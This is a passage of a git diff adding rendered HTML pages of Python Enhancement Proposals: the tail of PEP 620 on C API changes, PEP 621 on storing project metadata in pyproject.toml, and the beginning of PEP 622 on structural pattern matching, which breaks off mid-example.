#define Py_TYPE(ob)             (((PyObject*)(ob))->ob_type)
+
+
+

becomes:

+
#define _PyObject_CAST_CONST(op) ((const PyObject*)(op))
+
+static inline PyTypeObject* _Py_TYPE(const PyObject *ob) {
+    return ob->ob_type;
+}
+
+#define Py_TYPE(ob) _Py_TYPE(_PyObject_CAST_CONST(ob))
+
+
+

STATUS: Completed (in Python 3.10)

+

New functions Py_SET_TYPE(), Py_SET_REFCNT() and +Py_SET_SIZE() were added to Python 3.9.

+

In Python 3.10, Py_TYPE(), Py_REFCNT() and Py_SIZE() can no +longer be used as l-value and the new setter functions must be used +instead.

+
+
+

New C API functions must not return borrowed references

+

When a function returns a borrowed reference, Python cannot track when +the caller stops using this reference.

+

For example, if the Python list type were specialized for small integers, storing “raw” numbers directly rather than Python objects, then PyList_GetItem() would have to create a temporary Python object. The problem is deciding when it is safe to delete the temporary object.

+

The general guideline is for new C API functions to avoid returning borrowed references.

+

No function returning borrowed references is scheduled for removal by +this PEP.

+

STATUS: Completed (in Python 3.9)

+

In Python 3.9, new C API functions returning Python objects only return +strong references:

+
    +
  • PyFrame_GetBack()
  • +
  • PyFrame_GetCode()
  • +
  • PyObject_CallNoArgs()
  • +
  • PyObject_CallOneArg()
  • +
  • PyThreadState_GetFrame()
  • +
+
+
+

Avoid functions returning PyObject**

+

The PySequence_Fast_ITEMS() function gives direct access to an array of PyObject* objects. The function is deprecated in favor of PyTuple_GetItem() and PyList_GetItem().

+

PyTuple_GET_ITEM() can be abused to directly access the PyTupleObject.ob_item member:

+
PyObject **items = &PyTuple_GET_ITEM(tuple, 0);
+
+
+

The PyTuple_GET_ITEM() and PyList_GET_ITEM() macros are +converted to static inline functions to disallow that.

+

STATUS: Not Started

+
+
+

New pythoncapi_compat.h header file

+

Making structures opaque requires modifying C extensions to +use getter and setter functions. The practical issue is how to keep +support for old Python versions which don’t have these functions.

+

For example, in Python 3.10, it is no longer possible to use +Py_TYPE() as an l-value. The new Py_SET_TYPE() function must be +used instead:

+
#if PY_VERSION_HEX >= 0x030900A4
+    Py_SET_TYPE(&MyType, &PyType_Type);
+#else
+    Py_TYPE(&MyType) = &PyType_Type;
+#endif
+
+
+

This code may ring a bell to developers who ported their Python code +base from Python 2 to Python 3.

+

Python will distribute a new pythoncapi_compat.h header file which +provides new C API functions to old Python versions. Example:

+
#if PY_VERSION_HEX < 0x030900A4
+static inline void
+_Py_SET_TYPE(PyObject *ob, PyTypeObject *type)
+{
+    ob->ob_type = type;
+}
+#define Py_SET_TYPE(ob, type) _Py_SET_TYPE((PyObject*)(ob), type)
+#endif  // PY_VERSION_HEX < 0x030900A4
+
+
+

Using this header file, Py_SET_TYPE() can be used on old Python +versions as well.

+

Developers can copy this file into their project, or even copy/paste only the few functions needed by their C extension.

+

STATUS: In Progress (implemented but not distributed by CPython yet)

+

The pythoncapi_compat.h header file is currently developed at: +https://github.com/pythoncapi/pythoncapi_compat

+
+
+
+

Process to reduce the number of broken C extensions

+

Process to reduce the number of broken C extensions when introducing C +API incompatible changes listed in this PEP:

+
    +
  • Estimate how many popular C extensions are affected by the +incompatible change.
  • +
  • Coordinate with maintainers of broken C extensions to prepare their +code for the future incompatible change.
  • +
  • Introduce the incompatible changes in Python. The documentation must +explain how to port existing code. It is recommended to merge such +changes at the beginning of a development cycle to have more time for +tests.
  • +
  • Changes which are the most likely to break a large number of C +extensions should be announced on the capi-sig mailing list to notify +C extensions maintainers to prepare their project for the next Python.
  • +
• If the change breaks too many projects, reverting the change should be discussed, taking into account the number of broken packages, their importance in the Python community, and the importance of the change.
  • +
+

The coordination usually means reporting issues to the projects, or even +proposing changes. It does not require waiting for a new release including +fixes for every broken project.

+

Since more and more C extensions are written using Cython rather than using the C API directly, it is important to ensure that Cython is prepared in advance for incompatible changes. This gives C extension maintainers more time to release a new version with code generated by the updated Cython (for C extensions distributing the code generated by Cython).

+

Future incompatible changes can be announced by deprecating a function +in the documentation and by annotating the function with +Py_DEPRECATED(). But making a structure opaque and preventing the +usage of a macro as l-value cannot be deprecated with +Py_DEPRECATED().

+

The important part is coordination and finding a balance between CPython +evolutions and backward compatibility. For example, breaking a random, +old, obscure and unmaintained C extension on PyPI is less severe than +breaking numpy.

+

If a change is reverted, we move back to the coordination step to better +prepare the change. Once more C extensions are ready, the incompatible +change can be reconsidered.

+
+
+

Version History

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0620.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0621/index.html b/pep-0621/index.html new file mode 100644 index 00000000000..3b249a0486a --- /dev/null +++ b/pep-0621/index.html @@ -0,0 +1,924 @@ + PEP 621 – Storing project metadata in pyproject.toml | peps.python.org
+
+


+ + +
+
+
+

PEP 621 – Storing project metadata in pyproject.toml

+
+
Author:
+
Brett Cannon <brett at python.org>, +Dustin Ingram <di at python.org>, +Paul Ganssle <paul at ganssle.io>, +Pradyun Gedam <pradyunsg at gmail.com>, +Sébastien Eustace <sebastien at eustace.io>, +Thomas Kluyver <thomas at kluyver.me.uk>, +Tzu-ping Chung <uranusjr at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
22-Jun-2020
+
Post-History:
+
22-Jun-2020, +18-Oct-2020, +24-Oct-2020, +31-Oct-2020
+
Resolution:
+
Discourse message
+
+
+
+
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, pyproject.toml specification, is maintained on the PyPA specs page.

+


+

See the PyPA specification update process for how to propose changes.

+
+
+

Abstract

+

This PEP specifies how to write a project’s core metadata in a +pyproject.toml file for packaging-related tools to consume.

+
+
+

Motivation

+

The key motivators of this PEP are:

+
    +
  • Encourage users to specify core metadata statically for speed, +ease of specification, unambiguity, and deterministic consumption by +build back-ends
  • +
  • Provide a tool-agnostic way of specifying metadata for ease of +learning and transitioning between build back-ends
  • +
  • Allow for more code sharing between build back-ends for the +“boring parts” of a project’s metadata
  • +
+

To speak specifically to the motivation for static metadata, that has +been an overall goal of the packaging ecosystem for some time. As +such, making it easy to specify metadata statically is important. This +also means that raising the cost of specifying data as dynamic is +acceptable as users should skew towards wanting to provide static +metadata.

+

Requiring the distinction between static and dynamic metadata also +helps with disambiguation for when metadata isn’t specified. When any +metadata may be dynamic, it means you never know if the absence of +metadata is on purpose or because it is to be provided later. By +requiring that dynamic metadata be specified, it disambiguates the +intent when metadata goes unspecified.

+

This PEP does not attempt to standardize all possible metadata +required by a build back-end, only the metadata covered by the +core metadata specification which are very common across projects +and would stand to benefit from being static and consistently +specified. This means build back-ends are still free and able to +innovate around patterns like how to specify the files to include in a +wheel. There is also an included escape hatch for users and build +back-ends to use when they choose to partially opt-out of this PEP +(compared to opting-out of this PEP entirely, which is also possible).

+

This PEP is also not trying to change the underlying core metadata +in any way. Such considerations should be done in a separate PEP which +may lead to changes or additions to what this PEP specifies.

+
+
+

Rationale

+

The design guidelines the authors of this PEP followed were:

+
    +
  • Define a representation of as much of the core metadata in +pyproject.toml as is reasonable
  • +
  • Define the metadata statically with an escape hatch for those who +want to define it dynamically later via a build back-end
  • +
  • Use familiar names where it makes sense, but be willing to use more +modern terminology
  • +
  • Try to be ergonomic within a TOML file instead of mirroring how +build back-ends specify metadata at a low-level when it makes sense
  • +
  • Learn from other build back-ends in the packaging ecosystem which +have used TOML for their metadata
  • +
  • Don’t try to standardize things which lack a pre-existing standard +at a lower-level
  • +
  • When metadata is specified using this PEP, it is considered +canonical
  • +
+
+
+

Specification

+

When specifying project metadata, tools MUST adhere to and honour the metadata as specified in this PEP. If metadata is improperly specified then tools MUST raise an error to notify the user about their mistake.

+

Data specified using this PEP is considered canonical. Tools CANNOT +remove, add or change data that has been statically specified. Only +when a field is marked as dynamic may a tool provide a “new” value.

+
+

Details

+
+

Table name

+

Tools MUST specify fields defined by this PEP in a table named +[project]. No tools may add fields to this table which are not +defined by this PEP or subsequent PEPs. For tools wishing to store +their own settings in pyproject.toml, they may use the [tool] +table as defined in PEP 518. The lack of a [project] table +implicitly means the build back-end will dynamically provide all +fields.

+
+
+

name

+ +

The name of the project.

+

Tools MUST require users to statically define this field.

+

Tools SHOULD normalize this name, as specified by PEP 503, as soon +as it is read for internal consistency.

+
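
A sketch of that normalization, following the rule given in PEP 503 (the helper name is ours):

+
import re
+
+def normalize(name):
+    # PEP 503: runs of "-", "_" and "." are equivalent; compare lowercased.
+    return re.sub(r"[-_.]+", "-", name).lower()
+
+# normalize("My.Project_Name") == "my-project-name"
+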
+
+

version

+ +

The version of the project as supported by PEP 440.

+

Users SHOULD prefer to specify already-normalized versions.

+
+
+

description

+ +

The summary description of the project.

+
+
+

readme

+ +

The full description of the project (i.e. the README).

+

The field accepts either a string or a table. If it is a string then +it is the relative path to a text file containing the full +description. Tools MUST assume the file’s encoding is UTF-8. If the +file path ends in a case-insensitive .md suffix, then tools MUST +assume the content-type is text/markdown. If the file path ends in +a case-insensitive .rst, then tools MUST assume the content-type +is text/x-rst. If a tool recognizes more extensions than this PEP, +they MAY infer the content-type for the user without specifying this +field as dynamic. For all unrecognized suffixes when a +content-type is not provided, tools MUST raise an error.

+
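
A sketch of the suffix-based inference described above (the helper name and error message are ours):

+
from pathlib import Path
+
+_SUFFIX_TYPES = {".md": "text/markdown", ".rst": "text/x-rst"}
+
+def readme_content_type(path):
+    content_type = _SUFFIX_TYPES.get(Path(path).suffix.lower())
+    if content_type is None:
+        # Unrecognized suffix with no explicit content-type: an error.
+        raise ValueError(f"unrecognized README suffix: {path}")
+    return content_type
+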

The readme field may also take a table. The file key has a +string value representing a relative path to a file containing the +full description. The text key has a string value which is the +full description. These keys are mutually-exclusive, thus tools MUST +raise an error if the metadata specifies both keys.

+

A table specified in the readme field also has a content-type +field which takes a string specifying the content-type of the full +description. A tool MUST raise an error if the metadata does not +specify this field in the table. If the metadata does not specify the +charset parameter, then it is assumed to be UTF-8. Tools MAY +support other encodings if they choose to. Tools MAY support +alternative content-types which they can transform to a content-type +as supported by the core metadata. Otherwise tools MUST raise an +error for unsupported content-types.

+
+
+

requires-python

+ +

The Python version requirements of the project.

+
+
+

license

+ +

The table may have one of two keys. The file key has a string +value that is a relative file path to the file which contains the +license for the project. Tools MUST assume the file’s encoding is +UTF-8. The text key has a string value which is the license of the +project whose meaning is that of the License field from the +core metadata. These keys are mutually exclusive, so a tool MUST +raise an error if the metadata specifies both keys.

+

A practical string value for the license key has been purposefully +left out to allow for a future PEP to specify support for SPDX +expressions (the same logic applies to any sort of “type” field +specifying what license the file or text represents).

+
+
+

authors/maintainers

+
    +
  • Format: Array of inline tables with string keys and values
  • +
  • Core metadata: Author/Author-email/Maintainer/Maintainer-email +(link)
  • +
  • Synonyms
      +
    • Flit: author/author-email/maintainer/maintainer-email +(link)
    • +
    • Poetry: authors/maintainers +(link)
    • +
    • Setuptools: author/author_email/maintainer/maintainer_email +(link)
    • +
    +
  • +
+

The people or organizations considered to be the “authors” of the +project. The exact meaning is open to interpretation — it may list the +original or primary authors, current maintainers, or owners of the +package.

+

The “maintainers” field is similar to “authors” in that its exact +meaning is open to interpretation.

+

These fields accept an array of tables with 2 keys: name and +email. Both values must be strings. The name value MUST be a +valid email name (i.e. whatever can be put as a name, before an email, +in RFC 822) and not contain commas. The email value MUST be a +valid email address. Both keys are optional.

+

Using the data to fill in core metadata is as follows (a sketch of this mapping follows the list):

+
    +
  1. If only name is provided, the value goes in +Author/Maintainer as appropriate.
  2. +
  3. If only email is provided, the value goes in +Author-email/Maintainer-email as appropriate.
  4. +
  5. If both email and name are provided, the value goes in +Author-email/Maintainer-email as appropriate, with the +format {name} <{email}> (with appropriate quoting, e.g. using +email.headerregistry.Address).
  6. +
  7. Multiple values should be separated by commas.
  8. +
+
+
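
A non-normative sketch of that mapping (the helper name is ours):

+
from email.headerregistry import Address
+
+def format_people(people):
+    """Map an array of {name, email} tables to the values of the
+    Author/Maintainer and Author-email/Maintainer-email fields."""
+    names, emails = [], []
+    for person in people:
+        name, email = person.get("name"), person.get("email")
+        if name and email:
+            # Address applies the quoting required by RFC 822 names.
+            emails.append(str(Address(display_name=name, addr_spec=email)))
+        elif email:
+            emails.append(email)
+        elif name:
+            names.append(name)
+    return ", ".join(names), ", ".join(emails)
+
+# format_people([{"name": "Brett Cannon", "email": "brett@python.org"}])
+# == ("", "Brett Cannon <brett@python.org>")
+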
+

keywords

+ +

The keywords for the project.

+
+
+

classifiers

+ +

Trove classifiers which apply to the project.

+
+
+

urls

+ +

A table of URLs where the key is the URL label and the value is the +URL itself.

+
+
+

Entry points

+ +

There are three tables related to entry points. The +[project.scripts] table corresponds to the console_scripts +group in the entry points specification. The key of the table is the name of the +entry point and the value is the object reference.

+

The [project.gui-scripts] table corresponds to the gui_scripts +group in the entry points specification. Its format is the same as +[project.scripts].

+

The [project.entry-points] table is a collection of tables. Each +sub-table’s name is an entry point group. The key and value semantics +are the same as [project.scripts]. Users MUST NOT create +nested sub-tables but instead keep the entry point groups to only one +level deep.

+

Build back-ends MUST raise an error if the metadata defines a +[project.entry-points.console_scripts] or +[project.entry-points.gui_scripts] table, as they would +be ambiguous in the face of [project.scripts] and +[project.gui-scripts], respectively.

+
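
A sketch of how a build back-end might collect the three tables into entry point groups while enforcing the rule above (the helper name is ours, and project is assumed to be the parsed [project] table):

+
def entry_point_groups(project):
+    groups = {}
+    if "scripts" in project:
+        groups["console_scripts"] = project["scripts"]
+    if "gui-scripts" in project:
+        groups["gui_scripts"] = project["gui-scripts"]
+    for group, table in project.get("entry-points", {}).items():
+        if group in ("console_scripts", "gui_scripts"):
+            # Ambiguous with [project.scripts]/[project.gui-scripts].
+            raise ValueError(f"{group} must not appear in [project.entry-points]")
+        groups[group] = table
+    return groups
+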
+
+

dependencies/optional-dependencies

+
    +
  • Format: Array of PEP 508 strings (dependencies) and a table +with values of arrays of PEP 508 strings +(optional-dependencies)
  • +
  • Core metadata: Requires-Dist and Provides-Extra +(link, +link)
  • +
  • Synonyms
      +
    • Flit: requires for required dependencies, requires-extra +for optional dependencies +(link)
    • +
    • Poetry: [tool.poetry.dependencies] for dependencies (both +required and for development), +[tool.poetry.extras] for optional dependencies +(link)
    • +
    • Setuptools: install_requires for required dependencies, +extras_require for optional dependencies +(link)
    • +
    +
  • +
+

The (optional) dependencies of the project.

+

For dependencies, it is a key whose value is an array of strings. +Each string represents a dependency of the project and MUST be +formatted as a valid PEP 508 string. Each string maps directly to +a Requires-Dist entry in the core metadata.

+

For optional-dependencies, it is a table where each key specifies +an extra and whose value is an array of strings. The strings of the +arrays must be valid PEP 508 strings. The keys MUST be valid values +for the Provides-Extra core metadata. Each value in the array +thus becomes a corresponding Requires-Dist entry for the matching +Provides-Extra metadata.

+
+
+

dynamic

+ +

Specifies which fields listed by this PEP were intentionally unspecified so another tool can/will provide such metadata dynamically. This clearly delineates which metadata is purposefully unspecified and expected to stay unspecified compared to being provided via tooling later on. The rules below are illustrated by a sketch after the list.

+
    +
  • A build back-end MUST honour statically-specified metadata (which +means the metadata did not list the field in dynamic).
  • +
  • A build back-end MUST raise an error if the metadata specifies the +name in dynamic.
  • +
  • If the core metadata specification lists a field as “Required”, +then the metadata MUST specify the field statically or list it in +dynamic (build back-ends MUST raise an error otherwise, i.e. it +should not be possible for a required field to not be listed somehow +in the [project] table).
  • +
  • If the core metadata specification lists a field as “Optional”, +the metadata MAY list it in dynamic if the expectation is a +build back-end will provide the data for the field later.
  • +
  • Build back-ends MUST raise an error if the metadata specifies a +field statically as well as being listed in dynamic.
  • +
  • If the metadata does not list a field in dynamic, then a build +back-end CANNOT fill in the requisite metadata on behalf of the user +(i.e. dynamic is the only way to allow a tool to fill in +metadata and the user must opt into the filling in).
  • +
  • Build back-ends MUST raise an error if the metadata specifies a +field in dynamic but the build back-end was unable to provide the +data for it.
  • +
+
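
A rough sketch of these checks (project is assumed to be the parsed [project] table, and the helper name is ours; per the core metadata specification, name and version are the required fields):

+
def check_dynamic(project, required=("name", "version")):
+    dynamic = set(project.get("dynamic", ()))
+    if "name" in dynamic:
+        raise ValueError("'name' must always be statically specified")
+    for field in dynamic:
+        if field in project:
+            raise ValueError(f"{field!r} is both static and dynamic")
+    for field in required:
+        if field not in project and field not in dynamic:
+            raise ValueError(f"required field {field!r} is unaccounted for")
+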
+
+
+

Example

+
[project]
+name = "spam"
+version = "2020.0.0"
+description = "Lovely Spam! Wonderful Spam!"
+readme = "README.rst"
+requires-python = ">=3.8"
+license = {file = "LICENSE.txt"}
+keywords = ["egg", "bacon", "sausage", "tomatoes", "Lobster Thermidor"]
+authors = [
+  {email = "hi@pradyunsg.me"},
+  {name = "Tzu-ping Chung"}
+]
+maintainers = [
+  {name = "Brett Cannon", email = "brett@python.org"}
+]
+classifiers = [
+  "Development Status :: 4 - Beta",
+  "Programming Language :: Python"
+]
+
+dependencies = [
+  "httpx",
+  "gidgethub[httpx]>4.0.0",
+  "django>2.1; os_name != 'nt'",
+  "django>2.0; os_name == 'nt'"
+]
+
+[project.optional-dependencies]
+test = [
+  "pytest < 5.0.0",
+  "pytest-cov[all]"
+]
+
+[project.urls]
+homepage = "https://example.com"
+documentation = "https://readthedocs.org"
+repository = "https://github.com"
+changelog = "https://github.com/me/spam/blob/master/CHANGELOG.md"
+
+[project.scripts]
+spam-cli = "spam:main_cli"
+
+[project.gui-scripts]
+spam-gui = "spam:main_gui"
+
+[project.entry-points."spam.magical"]
+tomatoes = "spam:main_tomatoes"
+
+
+
+
+
+

Backwards Compatibility

+

As this provides a new way to specify a project’s core metadata and +is using a new table name which falls under the reserved namespace as +outlined in PEP 518, there are no backwards-compatibility concerns.

+
+
+

Security Implications

+

There are no direct security concerns as this PEP covers how to +statically define project metadata. Any security issues would stem +from how tools consume the metadata and choose to act upon it.

+
+
+

Reference Implementation

+

There are currently no proofs-of-concept from any build back-end +implementing this PEP.

+
+
+

Rejected Ideas

+
+

Other table names

+
+

Anything under [build-system]

+

There was worry that using this table name would exacerbate confusion +between build metadata and project metadata, e.g. by using +[build-system.metadata] as a table.

+
+
+

[package]

+

Garnered no strong support.

+
+
+

[metadata]

+

The strongest contender after [project], but in the end it was +agreed that [project] read better for certain sub-tables, e.g. +[project.urls].

+
+
+
+

Support for a metadata provider

+

Initially there was a proposal to add a middle layer between the +static metadata specified by this PEP and +prepare_metadata_for_build_wheel() as specified by PEP 517. The +idea was that if a project wanted to insert itself between a build +back-end and the metadata there would be a hook to do so.

+

In the end the authors considered this idea unnecessarily complicated +and would move the PEP away from its design goal to push people to +define core metadata statically as much as possible.

+
+
+

Require a normalized project name

+

While it would make things easier for tools to only work with the +normalized name as specified in PEP 503, the idea was ultimately +rejected as it would hurt projects transitioning to using this PEP.

+
+
+

Specify files to include when building

+

The authors decided fairly quickly during design discussions that +this PEP should focus exclusively on project metadata and not build +metadata. As such, specifying what files should end up in a source +distribution or wheel file is out of scope for this PEP.

+
+
+

Name the [project.urls] table [project.project-urls]

+

This suggestion came thanks to the corresponding core metadata +being Project-Url. But once the overall table name of [project] +was chosen, the redundant use of the word “project” suggested the +current, shorter name was a better fit.

+
+
+

Have a separate url/home-page field

+

While the core metadata supports it, having a single field for a +project’s URL while also supporting a full table seemed redundant and +confusing.

+
+ +
+

Have the dynamic field only require specifying missing required fields

+

The authors considered the idea that the dynamic field would only +require the listing of missing required fields and make listing +optional fields optional. In the end, though, this went against the +design goal of promoting specifying as much information statically as +possible.

+
+
+

Different structures for the readme field

+

The readme field had a proposed readme_content_type field, but +the authors considered the string/table hybrid more practical for the +common case while still accommodating the more complex case. Same goes +for using long_description and a corresponding +long_description_content_type field.

+

The file key in the table format was originally proposed as +path, but file corresponds to setuptools’ file key and +there is no strong reason otherwise to choose one over the other.

+
+
+

Allowing the readme field to imply text/plain

+

The authors considered allowing for unspecified content-types which +would default to text/plain, but decided that it would be best to +be explicit in this case to prevent accidental incorrect renderings on +PyPI and to force users to be clear in their intent.

+
+
+

Other names for dependencies/optional-dependencies

+

The authors originally proposed requires/extra-requires as +names, but decided to go with the current names after a survey of +other packaging ecosystems showed Python was an outlier:

+
    +
  1. npm
  2. Rust
  3. Dart
  4. Swift
  5. Ruby
+

Normalizing on the current names helps minimize confusion for people coming from +other ecosystems without using terminology that is necessarily foreign to new +programmers. It also prevents potential confusion with requires in the +[build-system] table as specified in PEP 518.

+
+
+

Drop maintainers to unify with authors

+

As the difference between Authors and Maintainers fields in +the core metadata is unspecified and ambiguous, this PEP originally +proposed unifying them as a single authors field. Other ecosystems +have selected “author” as the term to use, so the thinking was to +standardize on Author in the core metadata as the place to list +people maintaining a project.

+

In the end, though, the decision to adhere to the core metadata was +deemed more important to help with the acceptance of this PEP, +rather than trying to introduce a new interpretation for some of the +core metadata.

+
+
+

Support an arbitrary depth of tables for project.entry-points

+

There was a worry that keeping project.entry-points to a depth of 1 for sub-tables +would cause confusion to users if they use a dotted name and are not used to table +names using quotation marks (e.g. project.entry-points."spam.magical"). But +supporting an arbitrary depth – e.g. project.entry-points.spam.magical – would +preclude any form of an exploded table format in the future. It would also complicate +things for build back-ends as they would have to make sure to traverse the full +table structure rather than a single level and raise errors as appropriate on +value types.

+
+
+

Using structured TOML dictionaries to specify dependencies

+

The format for specifying the dependencies of a project was the most +hotly contested topic in terms of data format. It led to the creation +of both PEP 631 and PEP 633 which represent what is in this PEP +and using TOML dictionaries more extensively, respectively. The +decision on those PEPs can be found at +https://discuss.python.org/t/how-to-specify-dependencies-pep-508-strings-or-a-table-in-toml/5243/38.

+

The authors briefly considered supporting both formats, but decided +that it would lead to confusion as people would need to be familiar +with two formats instead of just one.

+
+
+

Require build back-ends to update pyproject.toml when generating an sdist

+

When this PEP was written, sdists did not require having static, +canonical metadata like this PEP does. The idea was then considered to +use this PEP as a way to get such metadata into sdists. In the end, +though, the idea of updating pyproject.toml was not generally +liked, and so the idea was rejected in favour of separately pursuing +standardizing metadata in sdists.

+
+
+

Allow tools to add/extend data

+

In an earlier version of this PEP, tools were allowed to extend data +for fields. For instance, build back-ends could take the version +number and add a local version for when they built the wheel. Tools +could also add more trove classifiers for things like the license or +supported Python versions.

+

In the end, though, it was thought better to start out stricter and +contemplate loosening how static the data could be considered based +on real-world usage.

+
+
+
+

Open Issues

+

None at the moment.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0621.rst

+

Last modified: 2023-12-06 16:17:05 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0622/index.html b/pep-0622/index.html new file mode 100644 index 00000000000..6f36bad5080 --- /dev/null +++ b/pep-0622/index.html @@ -0,0 +1,2329 @@ + + PEP 622 – Structural Pattern Matching | peps.python.org + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 622 – Structural Pattern Matching

+
+
Author:
+
Brandt Bucher <brandt at python.org>, +Daniel F Moisset <dfmoisset at gmail.com>, +Tobias Kohn <kohnt at tobiaskohn.ch>, +Ivan Levkivskyi <levkivskyi at gmail.com>, +Guido van Rossum <guido at python.org>, +Talin <viridia at gmail.com>
+
BDFL-Delegate:
+

+
Discussions-To:
+
Python-Dev list
+
Status:
+
Superseded
+
Type:
+
Standards Track
+
Created:
+
23-Jun-2020
+
Python-Version:
+
3.10
+
Post-History:
+
23-Jun-2020, 08-Jul-2020
+
Superseded-By:
+
634
+
+
+
+
+
+
+

Abstract

+

This PEP proposes to add a pattern matching statement to Python, +inspired by similar syntax found in Scala, Erlang, and other languages.

+
+

Patterns and shapes

+

The pattern syntax builds on Python’s existing syntax for sequence +unpacking (e.g., a, b = value).

+

A match statement compares a value (the subject) +to several different shapes (the patterns) until a shape fits. +Each pattern describes the type and structure of the accepted values +as well as the variables in which to capture its contents.

+

Patterns can specify the shape to be:

+
    +
  • a sequence to be unpacked, as already mentioned
  • +
  • a mapping with specific keys
  • +
  • an instance of a given class with (optionally) specific attributes
  • +
  • a specific value
  • +
  • a wildcard
  • +
+

Patterns can be composed in several ways.

+
+
+

Syntax

+

Syntactically, a match statement contains:

+
    +
  • a subject expression
  • +
  • one or more case clauses
  • +
+

Each case clause specifies:

+
    +
  • a pattern (the overall shape to be matched)
  • +
  • an optional “guard” (a condition to be checked if the pattern matches)
  • +
  • a code block to be executed if the case clause is selected
  • +
+
+
+

Motivation

+

The rest of the PEP:

+
    +
  • motivates why we believe pattern matching makes a good addition to Python
  • +
  • explains our design choices
  • +
  • contains a precise syntactic and runtime specification
  • +
  • gives guidance for static type checkers (and one small addition to the typing module)
  • +
  • discusses the main objections and alternatives that have been +brought up during extensive discussion of the proposal, both within +the group of authors and in the python-dev community
  • +
+

Finally, we discuss some possible extensions that might be considered +in the future, once the community has ample experience with the +currently proposed syntax and semantics.

+
+
+
+

Overview

+

Patterns are a new syntactical category with their own rules +and special cases. Patterns mix input (given values) and output +(captured variables) in novel ways. They may take a little time to +use effectively. The authors have provided +a brief introduction to the basic concepts here. Note that this section +is not intended to be complete or entirely accurate.

+
+

Pattern, a new syntactic construct, and destructuring

+

A new syntactic construct called pattern is introduced in this +PEP. Syntactically, patterns look like a subset of expressions. +The following are examples of patterns:

+
    +
  • [first, second, *rest]
  • +
  • Point2d(x, 0)
  • +
  • {"name": "Bruce", "age": age}
  • +
  • 42
  • +
+

The above expressions may look like examples of object construction +with a constructor which takes some values as parameters and +builds an object from those components.

+

When viewed as a pattern, the above patterns mean the inverse operation of +construction, which we call destructuring. Destructuring takes a subject value +and extracts its components.

+

The syntactic similarity between object construction and destructuring is +intentional. It also follows the existing +Pythonic style of contexts which makes assignment targets (write contexts) look +like expressions (read contexts).

+

Pattern matching never creates objects. This is in the same way that +[a, b] = my_list doesn’t create a +new [a, b] list, nor read the values of a and b.

+
+
+

Matching process

+

During this matching process, +the structure of the pattern may not fit the subject, and matching fails.

+

For example, matching the pattern Point2d(x, 0) to the subject +Point2d(3, 0) successfully matches. The match also binds +the pattern’s free variable x to the subject’s value 3.

+

As another example, if the subject is [3, 0], the match fails +because the subject’s type list is not the pattern’s Point2d.

+

As a third example, if the subject is +Point2d(3, 7), the match fails because the +subject’s second coordinate 7 is not the same as the pattern’s 0.

+

The match statement tries to match a single subject to each of the +patterns in its case clauses. At the first +successful match to a pattern in a case clause:

+
    +
  • the variables in the pattern are assigned, and
  • +
  • a corresponding block is executed.
  • +
+

Each case clause can also specify an optional boolean condition, +known as a guard.

+

Let’s look at a more detailed example of a match statement. The +match statement is used within a function to define the building +of 3D points. In this example, the function can accept as input any of +the following: a tuple with 2 elements, a tuple with 3 elements, an +existing Point2d object, or an existing Point3d object:

+
def make_point_3d(pt):
+    match pt:
+        case (x, y):
+            return Point3d(x, y, 0)
+        case (x, y, z):
+            return Point3d(x, y, z)
+        case Point2d(x, y):
+            return Point3d(x, y, 0)
+        case Point3d(_, _, _):
+            return pt
+        case _:
+            raise TypeError("not a point we support")
+
+
+

Without pattern matching, this function’s implementation would require several +isinstance() checks, one or two len() calls, and a more +convoluted control flow. The match example version and the traditional +Python version without match translate into similar code under the hood. +A user familiar with pattern matching will likely find the match version +clearer than the traditional approach.

+
+
+
+

Rationale and Goals

+

Python programs frequently need to handle data which varies in type, +presence of attributes/keys, or number of elements. Typical examples +are operating on nodes of a mixed structure like an AST, handling UI +events of different types, processing structured input (like +structured files or network messages), or “parsing” arguments for a +function that can accept different combinations of types and numbers +of parameters. In fact, the classic ‘visitor’ pattern is an example of this, +done in an OOP style – but matching makes it much less tedious to write.

+

Much of the code to do so tends to consist of complex chains of nested +if/elif statements, including multiple calls to len(), +isinstance() and index/key/attribute access. Inside those branches +users sometimes need to destructure the data further to extract the +required component values, which may be nested several objects deep.

+

Pattern matching as present in many other languages provides an +elegant solution to this problem. These range from statically compiled +functional languages like F# and Haskell, via mixed-paradigm languages +like Scala and Rust, to dynamic languages like Elixir and +Ruby, and is under consideration for JavaScript. We are indebted to +these languages for guiding the way to Pythonic pattern matching, as +Python is indebted to so many other languages for many of its +features: many basic syntactic features were inherited from C, +exceptions from Modula-3, classes were inspired by C++, slicing came +from Icon, regular expressions from Perl, decorators resemble Java +annotations, and so on.

+

The usual logic for operating on heterogeneous data can be summarized +in the following way:

+
    +
  • Some analysis is done on the shape (type and components) of the +data: This could involve isinstance() or len() calls and/or extracting +components (via indexing or attribute access) which are checked for +specific values or conditions.
  • +
  • If the shape is as expected, some more components are possibly +extracted and some operation is done using the extracted values.
  • +
+

Take for example this piece of the Django web framework:

+
if (
+    isinstance(value, (list, tuple)) and
+    len(value) > 1 and
+    isinstance(value[-1], (Promise, str))
+):
+    *value, label = value
+    value = tuple(value)
+else:
+    label = key.replace('_', ' ').title()
+
+
+

We can see the shape analysis of the value at the top, followed +by the destructuring inside.

+

Note that shape analysis here involves checking the types both of the +container and of one of its components, and some checks on its number +of elements. Once we match the shape, we need to decompose the +sequence. With the proposal in this PEP, we could rewrite that code +into this:

+
match value:
+    case [*v, label := (Promise() | str())] if v:
+        value = tuple(v)
+    case _:
+        label = key.replace('_', ' ').title()
+
+
+

This syntax makes much more explicit which formats are possible for +the input data, and which components are extracted from where. You can +see a pattern similar to list unpacking, but also type checking: the +Promise() pattern is not an object construction, but represents +anything that’s an instance of Promise. The pattern operator | +separates alternative patterns (not unlike regular expressions or EBNF +grammars), and _ is a wildcard. (Note that the match syntax used +here will accept user-defined sequences, as well as lists and tuples.)

+

On some occasions, extraction of information is not as relevant as +identifying structure. Take the following example from the +Python standard library:

+
def is_tuple(node):
+    if isinstance(node, Node) and node.children == [LParen(), RParen()]:
+        return True
+    return (isinstance(node, Node)
+            and len(node.children) == 3
+            and isinstance(node.children[0], Leaf)
+            and isinstance(node.children[1], Node)
+            and isinstance(node.children[2], Leaf)
+            and node.children[0].value == "("
+            and node.children[2].value == ")")
+
+
